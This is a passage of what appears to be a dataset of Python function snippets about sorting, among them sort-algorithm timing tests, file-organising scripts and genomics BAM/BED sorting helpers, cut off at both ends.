bubbleSortData.append(bubbleSortCount)\r\n\r\n bubbleSortOptCount = Sorts.bubbleSortOpt(unsortedList[:testRange])\r\n bubbleSortOptData.append(bubbleSortOptCount)\r\n\r\n selectionSortCount = Sorts.selectionSort(unsortedList[:testRange])\r\n selectionSortData.append(selectionSortCount)\r\n\r\n insertionSortCount = Sorts.insertionSort(unsortedList[:testRange])\r\n insertionSortData.append(insertionSortCount)\r\n testRange += 1\r\n\r\n # Write the sort data to text file\r\n writeSortDataToText(bubbleSortData, bubbleSortOptData, selectionSortData, insertionSortData)", "def sort_music_data(sort_by = None):\n for lists in read_file():\n print(lists)\n pass", "def main():\n os.chdir('FilesToSort')\n extension_to_category = {}\n for filename in os.listdir('.'):\n if os.path.isdir(filename):\n continue\n extension = filename.split('.')[-1]\n make_subdirectories(extension, extension_to_category)\n shutil.move(filename, extension_to_category[extension])", "def main():\n\n list_size = [500, 1000, 10000]\n sort = {'Insertion': 0, 'Shell': 0, 'Python': 0}\n\n for t_list in list_size:\n counter = 0\n while counter < 100:\n list_test = list_gen(t_list)\n sort['Insertion'] += insertion_sort(list_test)[0]\n sort['Shell'] += shell_sort(list_test)[0]\n sort['Python'] += python_sort(list_test)[0]\n counter += 1\n\n print 'For the list containing %s lines:' % (t_list)\n\n for st in sort:\n print ('The %s Search took %.5f seconds to run.') % (st, sort[st] / counter)", "def _sort_by_name(bam_fn):", "def TurboSort(input_folder, output_file):\r\n\r\n atom_dict = {}\r\n for linelist in os.listdir(input_folder):\r\n file_line = 1\r\n with open(os.path.join(input_folder, linelist), \"r\") as fin:\r\n lines = fin.readlines()\r\n while file_line < len(lines):\r\n line_index = file_line - 1\r\n header, atomic_sym = lines[line_index], lines[line_index + 1]\r\n atomic_lines = int(header.split()[4])\r\n start = line_index + 2\r\n end = start + atomic_lines\r\n splice = lines[start: end]\r\n file_line = end + 1\r\n if atomic_sym in atom_dict.keys():\r\n atomic_lines_previous = int(atom_dict[atomic_sym][0].split()[4])\r\n atomic_lines += atomic_lines_previous\r\n start_line, end_line_previous = atom_dict[atomic_sym][0][:27], atom_dict[atomic_sym][0][27:]\r\n end_line_updated = end_line_previous.replace(str(atomic_lines_previous), str(atomic_lines))\r\n if len(end_line_updated) > 10:\r\n diff = len(end_line_updated) - 10\r\n end_line_updated = end_line_updated[diff:]\r\n atom_dict[atomic_sym][0] = start_line + end_line_updated\r\n elif len(end_line_updated) < 10:\r\n diff = 10 - len(end_line_updated)\r\n atom_dict[atomic_sym][0] = start_line + \" \"*diff + end_line_updated\r\n else:\r\n atom_dict[atomic_sym][0] = start_line + end_line_updated\r\n # Sorts each element by wavelength\r\n atom_dict[atomic_sym].extend(splice)\r\n temp = atom_dict[atomic_sym][2:]\r\n temp.sort()\r\n atom_dict[atomic_sym] = atom_dict[atomic_sym][:2]\r\n atom_dict[atomic_sym].extend(temp)\r\n else:\r\n header = [header, atomic_sym]\r\n header.extend(splice)\r\n atom_dict[atomic_sym] = header\r\n\r\n # Sorts each element block by atomic number\r\n vals = list(atom_dict.values())\r\n for val in vals:\r\n \"\\n\".join(val)\r\n vals.sort()\r\n lines = []\r\n for val in vals:\r\n lines.extend(val)\r\n\r\n with open(output_file, \"w\") as fout:\r\n for line in lines:\r\n fout.write(line)", "def sort_files(file_list, set_name, time_freq, normalise):\n \n out_dict = {}\n order = []\n \n if file_list:\n\tfor item in file_list:\n key = tuple(item[0:3])\n window = int(item[2])\n out_dict[key] = nio.InputData(item[0], item[1], runave=window, normalise=normalise)\n out_dict[key].tag = item[3]\n out_dict[key].window = window\n out_dict[key].set = set_name\n out_dict[key].datetimes = runave_time_correction(out_dict[key].datetime_axis()[:], time_freq)\n order.append(key) \n else:\n outdict = None\n\torder = None\n\n return out_dict, order", "def sort_chunks(self):\n\n first = True\n\n all_chunks = dict(self.dirty_chunk_cache)\n all_chunks.update(self.chunk_cache)\n self.chunk_cache.clear()\n self.dirty_chunk_cache.clear()\n for coords, chunk in all_chunks.iteritems():\n if chunk.dirty:\n if first:\n first = False\n self.save_chunk(chunk)\n self.chunk_cache[coords] = chunk\n else:\n self.dirty_chunk_cache[coords] = chunk\n else:\n self.chunk_cache[coords] = chunk", "def stochastic_filesort(stochastic_file_csv, taw_tup, var_list, model_dates, runs, output_root):\n\n print 'doing a file sort on the csv created by stochastic file finder'\n\n main_dictionary = {}\n\n taw_list = make_taw_list(taw_tup)\n\n open_read = time.time()\n rzsm_lst = []\n ro_lst = []\n eta_lst = []\n infil_lst = []\n print 'opening'\n with open(stochastic_file_csv, 'r') as rfile:\n print 'iterating on lines'\n line_start = time.time()\n\n for j, line in enumerate(rfile):\n line_item = line.split(',')\n\n numpy_path = line_item[0]\n string_date = line_item[1][:-1]\n numpy_date = datetime.strptime(string_date, '%Y-%m-%d')\n\n numpy_filename = os.path.split(numpy_path)[1]\n # print numpy_filename\n # print j, line\n if 'rzsm' in numpy_filename:\n rzsm_lst.append((numpy_path, numpy_date))\n elif 'ro' in numpy_filename:\n ro_lst.append((numpy_path, numpy_date))\n elif 'eta' in numpy_filename:\n eta_lst.append((numpy_path, numpy_date))\n elif 'infil' in numpy_filename:\n infil_lst.append((numpy_path, numpy_date))\n\n # if j > 1000000:\n # break\n if not j%10000:\n print j\n print('file line count {}'.format(j))\n line_end = (time.time() - line_start)\n print 'line time elapsed {}'.format(line_end)\n elapsed = (time.time() - open_read)\n print 'time elapsed to parse {}'.format(elapsed)\n\n # TODO now use sorted(list5, key=lambda vertex: (degree(vertex), vertex)) (firstkey, secondkey) tuple to sort by seed then TAW\n\n # sorting by a tuple of first, second and third criteria (seed, taw, date)\n def keyfunc(x):\n return os.path.split(x[0])[1].split('_')[6], os.path.split(x[0])[1].split('_')[4], x[1]\n\n rzsm_lst.sort(key=keyfunc)\n ro_lst.sort(key=keyfunc)\n eta_lst.sort(key=keyfunc)\n infil_lst.sort(key=keyfunc)\n\n print 'starting the taw sort'\n sort_start = time.time()\n ro_taw_sorted = taw_sort(ro_lst, runs, taw_list)\n sort_elapsed = (time.time() - sort_start)\n print 'sort elapsed {}'.format(sort_elapsed)\n\n eta_taw_sorted = taw_sort(eta_lst, runs, taw_list)\n sort_elapsed = (time.time() - sort_start)\n print 'sort elapsed {}'.format(sort_elapsed)\n\n infil_taw_sorted = taw_sort(infil_lst, runs, taw_list)\n sort_elapsed = (time.time() - sort_start)\n print 'sort elapsed {}'.format(sort_elapsed)\n\n rzsm_taw_sorted = taw_sort(rzsm_lst, runs, taw_list)\n sort_elapsed = (time.time() - sort_start)\n print 'sort elapsed {}'.format(sort_elapsed)\n\n # outname = '{}.csv'.format()\n\n list_output(taw_list, ro_taw_sorted, output_root, outname='ro_taw_{}.csv')\n list_output(taw_list, eta_taw_sorted, output_root, outname='eta_taw_{}.csv')\n list_output(taw_list, infil_taw_sorted, output_root, outname='infil_taw_{}.csv')\n list_output(taw_list, rzsm_taw_sorted, output_root, outname='rzsm_taw_{}.csv')\n\n # todo - finish out this so you can extract the value by loading the array and multiplying through each seed by each taw.", "def custom_sort(arr):\n pass", "def tweet_sort(twitter_data, results, cmp):\r\n \r\n # Insertion sort\r\n for i in range(1, len(results)):\r\n current = results[i]\r\n position = i\r\n while position > 0 and cmp(twitter_data, results[position - 1], current) > 0:\r\n results[position] = results[position - 1]\r\n position = position - 1 \r\n results[position] = current", "def sort_dataset_by_age():\n\n data = read_csv(Path(f'{data_files_path}/subject_data'))\n limits = get_limits(ageGroups)\n sortedCount = 0\n\n # For every age bin\n for target_folder, limit in limits.items():\n # Get the indexes of all files to be copied to the target folder\n index_list = list(data[(data['Age'] >= limit[0]) & (data['Age'] <= limit[1])].index)\n subjectCount = 0\n # For every file to be copied\n for i in index_list:\n filename = data.iloc[i]['Filename']\n temp = sortedCount\n # Get the source and destination file paths\n for src, dest in zip(new_sensor_paths, sensor_dirs[target_folder]):\n # if the file exists in the source directory\n if os.path.exists(Path(f'{src}/{filename[:-4]}.csv')):\n # copy it to the destination directory\n copyfile(Path(f'{src}/{filename[:-4]}.csv'), Path(f'{dest}/{filename[:-4]}.csv'))\n if temp == sortedCount:\n sortedCount += 1\n subjectCount += 1\n # print(f'src = {src}\\ndest = {dest}\\n\\n')\n\n print(f'\\n# of Subjects in \"{target_folder}\" = {subjectCount}')\n\n print(f'\\nTotal subjects sorted = {sortedCount} ({round((sortedCount / len(data)) * 100, 2)}% of total data)\\n')", "def handle_coreutils_sort_kwargs(self, prog='sort', instream=None, **kwargs):\n pybedtools.logger.debug(\n 'BedTool.handle_coreutils_sort_kwargs() got these kwargs:\\n%s',\n pprint.pformat(kwargs))\n\n stdin = None\n\n # Decide how to send instream to sort.\n # If it's a BedTool, then get underlying stream\n if isinstance(instream, BedTool):\n instream = instream.fn\n\n # Filename? No pipe, just provide the file\n if isinstance(instream, six.string_types):\n stdin = None\n input_fn = instream\n # A generator or iterator: pipe it as a generator of lines\n else:\n stdin = (str(i) for i in instream)\n input_fn = '-'\n\n # If stream not specified, then a tempfile will be created\n if kwargs.pop('stream', None):\n tmp = None\n else:\n output = kwargs.pop('output', None)\n if output:\n tmp = output\n else:\n tmp = BedTool._tmp()\n\n additional_args = kwargs.pop('additional_args', None)\n\n # Parse the kwargs into BEDTools-ready args\n cmds = [prog]\n\n for key, value in sorted(list(kwargs.items()), reverse=True):\n if isinstance(value, bool):\n if value:\n cmds.append('--' + key)\n else:\n continue\n elif isinstance(value, list) or isinstance(value, tuple):\n value = list(map(str, value))\n\n # sort --key 1,1 --key 2,2r -k 5,5\n for val in value:\n if len(key) == 1:\n cmds.append('-' + key)\n else:\n cmds.append('--' + key)\n cmds.append(str(val))\n else:\n cmds.append('--' + key)\n cmds.append(str(value))\n\n if additional_args:\n cmds.append(additional_args)\n\n cmds.append(input_fn)\n return cmds, tmp, stdin", "def sort(arr, filename):\n if len(arr) > 1:\n mid = len(arr) // 2 # Finding the mid of the array\n L = arr[:mid] # Dividing the array elements\n R = arr[mid:] # into 2 halves\n sort(L, filename) # Sorting the first half\n sort(R, filename) # Sorting the second half\n\n i = j = k = 0\n\n # Copy data to temp arrays L[] and R[]\n while i < len(L) and j < len(R):\n if L[i] < R[j]:\n arr[k] = L[i]\n i += 1\n else:\n arr[k] = R[j]\n j += 1\n k += 1\n\n # Checking if any element was left\n while i < len(L):\n arr[k] = L[i]\n i += 1\n k += 1\n\n while j < len(R):\n arr[k] = R[j]\n j += 1\n k += 1\n with open(\"output/temp/\" + filename, \"w\") as file:\n for item in arr:\n file.write('%s\\n' % item)", "def main():\n # The following dictionary will allow us to map extensions to the destination folder names\n extension_to_category = {}\n os.chdir(\"FilesToSort\")\n for filename in os.listdir('.'):\n # Ignore directories, just process files\n if os.path.isdir(filename):\n continue\n\n extension = filename.split('.')[-1]\n if extension not in extension_to_category:\n category = input(\"What category would you like to sort {} files into? \".format(extension))\n # Now we can map this new extension to a folder name\n extension_to_category[extension] = category\n try:\n # We don't expect to get an exception due to the if statement\n # But we'll play it safe anyway in case the user chooses an existing folder\n os.mkdir(category)\n except FileExistsError:\n pass\n\n # We don't need a separate loop for this next step\n # We're already in a loop per file and we now know where to put it\n os.rename(filename, \"{}/{}\".format(extension_to_category[extension], filename))", "def test_for_different_input_sizes_asc(self):\n for size in range(1, 50):\n c = [random.randint(1, 1000) for _ in range(size)]\n\n copy = c\n\n # sort using mergeSort and using builtin sort\n sort.asc(c)\n copy.sort()\n\n assert c == copy", "def oldsortslice(self):\n ...", "def main():\n os.chdir(\"FilesToSort\")\n files = os.listdir('.')\n for file in files:\n extension_directory = file[file.find('.') + 1:]\n try:\n os.mkdir(extension_directory)\n except FileExistsError:\n pass\n shutil.move(file, extension_directory)", "def sort_bed_dir(input_beddir,output_beddir):\n print(\"processing .. sorting bed files \",input_beddir)\n if not os.path.exists(input_beddir):\n raise(\"input directory does not exist\")\n if not os.path.exists(output_beddir):\n os.makedirs(output_beddir)\n\n cmd = [\"bedtools\", \"sort\", \"-i\", \"${FILENAME}.bed\"]\n for file in glob.glob(os.path.join(input_beddir, '*bed')):\n file_name = os.path.basename(file).split('.')[0]\n output_filename = os.path.join(output_beddir, file_name+\"_sort.bed\")\n bedtool_obj = pybedtools.BedTool(file)\n bedtool_obj.sort().saveas(output_filename)\n # cmd[-1] = file\n # with open(output_filename, \"w\") as file:\n # subprocess.run(cmd, check=True, stdout=file)", "def tweet_sort(twitter_data, results, cmp):\n\n # Insertion sort\n for i in range(1, len(results)):\n current = results[i]\n position = i\n while position > 0 and cmp(twitter_data, results[position - 1], current) > 0:\n results[position] = results[position - 1]\n position = position - 1\n results[position] = current", "def sort_files(read_path, search_str, recursive=False):\n\n #glob all raw files and sort\n #if recursive:\n # all_files = sorted(glob.glob('{}/**/{}'.format(read_path, search_str),\n # recursive=recursive))\n #else:\n # all_files = sorted(glob.glob('{}/{}'.format(read_path, search_str)))\n\n\n # dealing with google cloud bucket?\n google_cloud = (read_path[0:5] == 'gs://')\n\n if not google_cloud or types is None or 'object' in types:\n all_files = sorted(list_files(read_path, search_str, recursive=recursive))\n else:\n # reading a bucket fits file header is rather slow in the\n # Google cloud, so if only biases, darks, flats or object\n # images are needed through input parameter imgtypes (= global\n # parameter types), then only select those files\n tmp_files = []\n if 'bias' in types:\n tmp_files.append(list_files(read_path, 'Bias', recursive=recursive))\n if 'flat' in types:\n tmp_files.append(list_files(read_path, 'flat', recursive=recursive))\n if 'dark' in types:\n tmp_files.append(list_files(read_path, 'Dark', recursive=recursive))\n\n # for object files, all files are selected (first part of this\n # if statement), mainly because the raw image name does not\n # indicate the image type for object files\n\n # clean up lists within list\n all_files = sorted([f for sublist in tmp_files for f in sublist])\n\n\n biases = [] #list of biases\n darks = [] #list of darks\n flats = [] #list of flats\n objects = [] # list of science images\n others = [] # list of other images\n\n for i, filename in enumerate(all_files): #loop through raw files\n\n header = read_hdulist(filename, get_data=False, get_header=True)\n\n if 'IMAGETYP' not in header:\n log.info ('keyword IMAGETYP not present in header of image; '\n 'not processing {}'.format(filename))\n # add this file to [others] list, which will not be reduced\n others.append(filename)\n\n else:\n\n imgtype = header['IMAGETYP'].lower() #get image type\n\n if 'bias' in imgtype: #add bias files to bias list\n biases.append(filename)\n elif 'dark' in imgtype: #add dark files to dark list\n darks.append(filename)\n elif 'flat' in imgtype: #add flat files to flat list\n flats.append(filename)\n elif 'object' in imgtype: #add science files to science list\n objects.append(filename)\n else:\n # none of the above, add to others list\n others.append(filename)\n\n return biases, darks, flats, objects, others", "def apply_sorting(tasks, *conditions):\n return tasks.sort(conditions)", "def start_sorting(sorting_algos):\n for algo in sorting_algos:\n algo.run()", "def insertion_sort_file(filelist):\n i=0\n j=0\n while i < len(filelist)-1:\n j = i+1\n min = filelist[i]\n ind = i\n while j < len(filelist):\n if min.name > filelist[j].name:\n min = filelist[j]\n ind = j\n j += 1\n (filelist[i], filelist[ind]) = (filelist[ind], filelist[i])\n i += 1", "def process_file_sorting(\n cls,\n file: str,\n remove_duplicates: bool = True,\n write_header: bool = True,\n sorting_key: Any = None,\n ) -> None:\n\n # pylint: disable=too-many-locals,too-many-statements\n\n def merge_files(\n files: List[TextIOWrapper],\n ) -> Generator[Tuple[List[TextIOWrapper]], str, None]:\n \"\"\"\n Merges the given files and yield each \"lines\" of the merged file.\n\n :param files:\n The files to merge.\n \"\"\"\n\n result = []\n\n for index, file in enumerate(files):\n try:\n iterator = iter(file)\n value = next(iterator)\n\n heapq.heappush(\n result, ((sorting_key(value), index, value, iterator, file))\n )\n except StopIteration:\n file.close()\n\n previous = None\n comment_count = 0\n max_comment_count = 2\n\n while result:\n ignore = False\n\n _, index, value, iterator, file = heapq.heappop(result)\n\n if remove_duplicates and value == previous:\n ignore = True\n\n if (\n write_header\n and comment_count < max_comment_count\n and value[0] == \"#\"\n ):\n ignore = True\n max_comment_count += 1\n\n if not ignore:\n yield value\n previous = value\n\n try:\n value = next(iterator)\n\n heapq.heappush(\n result, ((sorting_key(value), index, value, iterator, file))\n )\n except StopIteration:\n file.close()\n\n temp_directory = tempfile.TemporaryDirectory()\n temporary_output_file = os.path.join(temp_directory.name, secrets.token_hex(6))\n\n if not sorting_key:\n sorting_key = get_best_sorting_key()\n\n file_helper = FileHelper(file)\n\n sorted_files = []\n\n PyFunceble.facility.Logger.info(\"Started sort of %r.\", file)\n\n with file_helper.open(\n \"r\", encoding=\"utf-8\", buffering=cls.FILE_BUFFER_SIZE\n ) as file_stream:\n while True:\n to_sort = list(islice(file_stream, cls.MAX_LINES))\n\n if not to_sort:\n break\n\n new_file = open(\n os.path.join(temp_directory.name, secrets.token_hex(6)),\n \"w+\",\n encoding=\"utf-8\",\n buffering=cls.FILE_BUFFER_SIZE,\n )\n new_file.writelines(\n ListHelper(to_sort)\n .remove_duplicates()\n .custom_sort(key_method=sorting_key)\n .subject\n )\n new_file.flush()\n new_file.seek(0)\n sorted_files.append(new_file)\n\n with open(\n temporary_output_file, \"w\", cls.FILE_BUFFER_SIZE, encoding=\"utf-8\"\n ) as file_stream:\n if write_header:\n file_stream.write(FilePrinter.STD_FILE_GENERATION)\n file_stream.write(FilePrinter.get_generation_date_line())\n file_stream.write(\"\\n\\n\")\n\n file_stream.writelines(merge_files(sorted_files))\n\n FileHelper(temporary_output_file).move(file)\n\n PyFunceble.facility.Logger.info(\"Finished sort of %r.\", file)\n\n temp_directory.cleanup()", "def test_sorting(sort=selection_sort, num_items=20, max_value=50):\n # TODO: Repeat until all items are in sorted order\n # TODO: Take first unsorted item\n # TODO: Insert it in sorted order in front of items", "def __get_sorted_file_list(self):\n d = self.__view.CurrentImgDir\n list = os.listdir(d)\n if self.__view.SortType == constant.THUMB_SORT_FILENAME:\n # Sort by Name\n list.sort()\n if self.__view.SortType == 2:\n # Sort by Size\n list.sort(lambda a, b: int(os.stat(os.path.join(d,a))[stat.ST_SIZE] - os.stat(os.path.join(d,b))[stat.ST_SIZE])) \n return list", "def _sift(self, fileslist, **arguments):\n\n def sort(reverse, arg, fileslist=fileslist):\n tdict = {fileslist[i][arg] : i for i in xrange(len(fileslist))}\n keys = tdict.keys()\n keys.sort(reverse=reverse)\n indexs = [tdict[i] for i in keys]\n fileslist = [fileslist[i] for i in indexs]\n return fileslist\n\n # for time\n if arguments.get('name'):\n reverse = None\n if arguments['name'] == 'reverse':\n reverse = True\n elif arguments['name'] == 'no_reverse':\n reverse = False\n fileslist = sort(reverse, 'server_filename')\n\n # for size\n if arguments.get('size'):\n reverse = None\n if arguments['size'] == 'reverse':\n reverse = True\n elif arguments['size'] == 'no_reverse':\n reverse = False\n fileslist = sort(reverse, 'size')\n\n # for size\n if arguments.get('time'):\n reverse = None\n if arguments['time'] == 'reverse':\n reverse = True\n elif arguments['time'] == 'no_reverse':\n reverse = False\n fileslist = sort(reverse, 'local_mtime')\n\n # for head, tail, include, exclude\n head = args.head\n tail = args.tail\n include = args.include\n exclude = args.exclude\n if head or tail or include or exclude:\n tdict = {fileslist[i]['server_filename'] : i for i in xrange(len(fileslist))}\n keys1 = [i for i in tdict.keys() if i.lower().startswith(head.encode('utf8').lower())] \\\n if head else []\n keys2 = [i for i in tdict.keys() if i.lower().endswith(tail.decode('utf8').lower())] \\\n if tail else []\n keys3 = [i for i in tdict.keys() if re.search(include, i.encode('utf8'), flags=re.I)] \\\n if include else []\n keys4 = [i for i in tdict.keys() if not re.search(exclude, i.encode('utf8'), flags=re.I)] \\\n if exclude else []\n\n # intersection\n keys = [i for i in [keys1, keys2, keys3, keys4] if i]\n if len(keys) > 1:\n tkeys = keys[0]\n for i in keys:\n tkeys &= i\n keys = tkeys\n elif len(keys) == 1:\n keys = keys[0]\n elif len(keys) == 0:\n keys = []\n\n indexs = [tdict[i] for i in keys]\n fileslist = [fileslist[i] for i in indexs]\n\n dirs = [i for i in fileslist if i['isdir']]\n files = [i for i in fileslist if not i['isdir']]\n if arguments.get('desc') == 1:\n dirs.reverse()\n files.reverse()\n fileslist = dirs + files\n\n return fileslist", "def main():\n\n tests = [500, 1000, 10000]\n results = {\n 'Insertion Sort': 0.0,\n 'Shell Sort': 0.0,\n 'Python Sort': 0.0\n }\n\n for test in tests:\n i = 0\n\n while i < 100:\n test_list = gen_random_list(test)\n results['Insertion Sort'] += insertion_sort(test_list)[0]\n results['Shell Sort'] += shell_sort(test_list)[0]\n results['Python Sort'] += python_sort(test_list)[0]\n i += 1\n\n print(\"Sort results for list of size %s items:\" % test)\n for key, value in results.items():\n print(\"%s took %10.7f seconds to run, on average.\" % (key, (value/100)))\n print(\"\\n\")", "def use_mergesort(inputfile, outputfile):\n f = open(inputfile, 'r')\n text = f.read()\n f.close\n numList = text.split()\n for i in range(len(numList)):\n numList[i] = int(numList[i])\n sorted_list = merge_sort(numList)\n output = ''\n for i in range(len(numList)):\n output += str(sorted_list[i]) + '\\n'\n g = open(outputfile, 'w')\n g.write(output)\n g.close()\n return", "def samples_sorted():\n\n import glob\n cars_original = glob.glob(\"./vehicles/*/*.png\")\n # The following are duplicated:\n cars_KITTI = glob.glob(\"./vehicles/KITTI_extracted/*.png\")\n cars_GTI_Right = glob.glob(\"./vehicles/GTI_Right/*.png\")\n cars_GTI_Left = glob.glob(\"./vehicles/GTI_Left/*.png\")\n cars = cars_original + cars_KITTI + cars_GTI_Left + cars_GTI_Right\n # The above introduces duplication of samples, causing bleeding of training samples into validation\n np.random.shuffle(cars) # side effect return None\n cars_to_be_augmented = cars_GTI_Left + cars_GTI_Right\n np.random.shuffle(cars_to_be_augmented)\n num_cars = len(cars) + len(cars_to_be_augmented)\n\n non_cars_original = glob.glob(\"./non-vehicles/*/*.png\")\n # The following are duplicated:\n non_cars_Extras = glob.glob(\"./non-vehicles/Extras/*.png\")\n noncars = non_cars_original + non_cars_Extras + non_cars_Extras\n # The above introduces duplication of samples, causing bleeding of training samples into validation\n np.random.shuffle(noncars) # side effect return None\n num_noncars = len(noncars)\n return cars, noncars, cars_to_be_augmented, num_cars, num_noncars", "def sort_bam(self) -> None:\n self.analysis.logger.info(\"Sorting BAM(s)\")\n self.chdir()\n config = self.analysis.config\n\n os.makedirs(self.sort_tempdir, exist_ok=True)\n\n executor = Executor(self.analysis)\n executor(\n f\"{config.java} {config.picard_jvm_args} -jar {config.picard} \"\n f\"SortSam \"\n f\"I={{input_filename}} \"\n f\"O={{output_filename}} SO=coordinate \"\n f\"TMP_DIR={self.sort_tempdir}\"\n f\"{self.max_records_str}\",\n output_format=f\"{self.analysis.basename}.srt{{organism_str}}.bam\",\n error_string=\"Picard SortSam exited with status {status}\",\n exception_string=\"picard SortSam error\",\n only_human=self.only_human,\n split_by_organism=True,\n unlink_inputs=True,\n )\n\n executor(\n f\"{config.java} {config.picard_jvm_args} -jar {config.picard} \"\n f\"ReorderSam \"\n f\"I={{input_filename}} \"\n f\"O={{output_filename}} R={{genome_ref}} \"\n f\"CREATE_INDEX=true\"\n f\"{self.max_records_str}\",\n output_format=f\"{self.analysis.basename}\"\n f\".srt.reorder{{organism_str}}.bam\",\n error_string=\"Picard ReorderSam exited with status {status}\",\n exception_string=\"picard ReorderSam error\",\n only_human=self.only_human,\n split_by_organism=True,\n unlink_inputs=True,\n )\n\n if os.path.exists(self.sort_tempdir):\n shutil.rmtree(self.sort_tempdir)\n self.analysis.logger.info(\"Finished sorting\")", "def test_three_split():\n run_mergesort([3, 0, 3], [0, 3, 3])", "def keysort(*args, **kwargs): # real signature unknown\n pass", "def isort(context):\n exec_cmd = \"isort . --check --diff\"\n run_cmd(context, exec_cmd)", "def mergeSortedToFile(arr):\n # list the elements of sorted text file\n # print(arr)\n sortedFileList = []\n with open(OUTPUT_SORTED_FILE) as file:\n for line in file:\n line = int(line.strip())\n sortedFileList.append(line)\n l1 = len(arr)\n l2 = len(sortedFileList)\n l3 = l1 + l2\n m = 0\n i = 0\n j = 0\n out2 = [0] * l3\n while (i < l1 and j < l2):\n if (arr[i] < sortedFileList[j]):\n out2[m] = arr[i]\n m += 1\n i += 1\n else:\n out2[m] = sortedFileList[j]\n m += 1\n j += 1\n while (i < l1):\n out2[m] = arr[i]\n m += 1\n i += 1\n while (j < l2):\n out2[m] = sortedFileList[j]\n m += 1\n j += 1\n # writing merged sorted output list to tht output file\n with open(OUTPUT_SORTED_FILE, \"w\") as file:\n for item in out2:\n file.write('%s\\n' % item)", "def sort_bam(inbamfile,\n outbamfile,\n sort_order=\"coordinate\"):\n\n cmd_sort = \"java -Xmx6g -jar $NGS_PICARD/SortSam.jar \" \\\n \"INPUT=%s \" \\\n \"OUTPUT=%s \" \\\n \"SORT_ORDER=%s\" % (inbamfile,\n outbamfile,\n sort_order)\n return cmd_sort", "def sort_batch_tsvs(self,batch,batch_dir):\n tsvs = []\n for file in os.listdir(batch_dir):\n if file.endswith(\".tsv\"):\n tsvs.append(os.path.join(batch_dir, file))\n\n nodes = self.get_submission_order()\n nodes = [i[0] for i in nodes]\n\n node_tsvs = {}\n clinical_manifests,image_manifests = [],[]\n other_tsvs,nomatch_tsvs = [],[]\n node_regex = r\".*/(\\w+)_{}\\.tsv\".format(batch)\n\n for tsv in tsvs:\n print(tsv)\n if 'manifest' in tsv:\n if 'clinical' in tsv:\n clinical_manifests.append(tsv)\n elif 'image' in tsv or 'imaging' in tsv:\n image_manifests.append(tsv)\n else:\n match = re.findall(node_regex, tsv, re.M)\n print(match)\n\n if not match:\n nomatch_tsvs.append(tsv)\n else:\n node = match[0]\n if node in nodes:\n #node_tsvs.append({node:tsv})\n node_tsvs[node] = tsv\n elif node + \"_file\" in nodes:\n #node_tsvs.append({\"{}_file\".format(node):tsv})\n node_tsvs[\"{}_file\".format(node)] = tsv\n else:\n other_tsvs.append({node:tsv})\n batch_tsvs = {\"batch\":batch,\n \"node_tsvs\":node_tsvs,\n \"image_manifests\":image_manifests,\n \"clinical_manifests\":clinical_manifests,\n \"other_tsvs\":other_tsvs,\n \"nomatch_tsvs\":nomatch_tsvs}\n return batch_tsvs", "def sort_files_by_name(names: List[str], reverse: bool = False):\n num_sort_index: int\n num_count: int\n\n def get_image_index(name: str):\n \"\"\"\n Get the index of name.\n filename: 'MR Neck PS.eT2W_SPAIR SENSE.Se 602.Img 10-32.jpg'\n the index is 10\n :param name:\n :return:\n \"\"\"\n base_name = os.path.basename(name)\n nums = pattern.findall(base_name)\n if len(nums) != num_count:\n raise BaseException(f\"can't exact index from the string: {name}\")\n return float(nums[num_sort_index])\n\n if len(names) > 2:\n num1 = pattern.findall(os.path.basename(names[0]))\n num2 = pattern.findall(os.path.basename(names[1]))\n # 解析出来的数字数目应该一样多\n num_count = len(num1)\n assert num_count == len(num2)\n arr1 = np.array(num1)\n arr2 = np.array(num2)\n diff: np.ndarray = arr1 == arr2\n\n # 按道理最多只能有一个数字不一样\n # 40806068_20200827_MR_6_2_2.jpg\n # 40806068_20200827_MR_6_3_3.jpg\n # assert diff.sum() + 1 == num_count\n\n # numpy数组中: True = 1, False = 0\n num_sort_index = diff.argmin()\n # TODO remove this line\n # print(num1, num2, num_sort_index)\n\n names.sort(key=get_image_index, reverse=reverse)\n return names", "def volume_sort(self):\n self.jobs_sorted = sorted(\n self.jobs,\n key=lambda job: (job['height'], job['width'] * job['height']),\n # key=lambda job: job['width'] * job['height'],\n reverse=True)", "def add_sort_filter(source, args, index):\n tags = hxl.TagPattern.parse_list(args.get('sort-tags%02d' % index, ''))\n reverse = (args.get('sort-reverse%02d' % index) == 'on')\n return source.sort(tags, reverse)", "def sortbatch(q_batch, a_batch, q_lens, a_lens):\n maxlen_q = max(q_lens)\n maxlen_a = max(a_lens)\n q=q_batch[:,:maxlen_q-1]\n a=a_batch[:,:maxlen_a-1]\n sorted_idx = torch.LongTensor(a_lens.numpy().argsort()[::-1].copy())\n return q[sorted_idx], a[sorted_idx], q_lens[sorted_idx], a_lens[sorted_idx]", "def sort(args):\n p = OptionParser(sort.__doc__)\n p.add_option(\n \"--sizes\", default=False, action=\"store_true\", help=\"Sort by decreasing size\"\n )\n\n opts, args = p.parse_args(args)\n\n if len(args) != 1:\n sys.exit(p.print_help())\n\n (fastafile,) = args\n sortedfastafile = fastafile.rsplit(\".\", 1)[0] + \".sorted.fasta\"\n\n f = Fasta(fastafile, index=False)\n fw = must_open(sortedfastafile, \"w\")\n if opts.sizes:\n # Sort by decreasing size\n sortlist = sorted(f.itersizes(), key=lambda x: (-x[1], x[0]))\n logging.debug(\n \"Sort by size: max: {0}, min: {1}\".format(sortlist[0], sortlist[-1])\n )\n sortlist = [x for x, s in sortlist]\n else:\n sortlist = sorted(f.iterkeys())\n\n for key in sortlist:\n rec = f[key]\n SeqIO.write([rec], fw, \"fasta\")\n\n logging.debug(\"Sorted file written to `{0}`.\".format(sortedfastafile))\n fw.close()\n\n return sortedfastafile", "def run_mergesort(original, expected):\n mergesort(original)\n assert original == expected", "def sortby(self):\n ...", "def sort_collected_data():\n\n def is_from_valid_set(fn):\n return fn.find(\"validation\") != -1\n\n source_dir = \"data\"\n\n x_train_dir = os.path.join(SEG_DATA_FOLDER, \"train\")\n y_train_dir = os.path.join(SEG_DATA_FOLDER, \"train_label\")\n x_valid_dir = os.path.join(SEG_DATA_FOLDER, \"val\")\n y_valid_dir = os.path.join(SEG_DATA_FOLDER, \"val_label\")\n\n for direc in [x_train_dir, y_train_dir, x_valid_dir, y_valid_dir]:\n mkdir_if_not_exist(direc)\n\n images = [x for x in os.listdir(source_dir) if x.find(\"png\") >= 0]\n inputs = [x for x in images if x.find(\"label\") == -1]\n labels = [x for x in images if x.find(\"label\") != -1]\n\n train_x = [x for x in inputs if not is_from_valid_set(x)]\n valid_x = [x for x in inputs if is_from_valid_set(x)]\n train_y = [x for x in labels if not is_from_valid_set(x)]\n valid_y = [x for x in labels if is_from_valid_set(x)]\n\n for f in train_x:\n 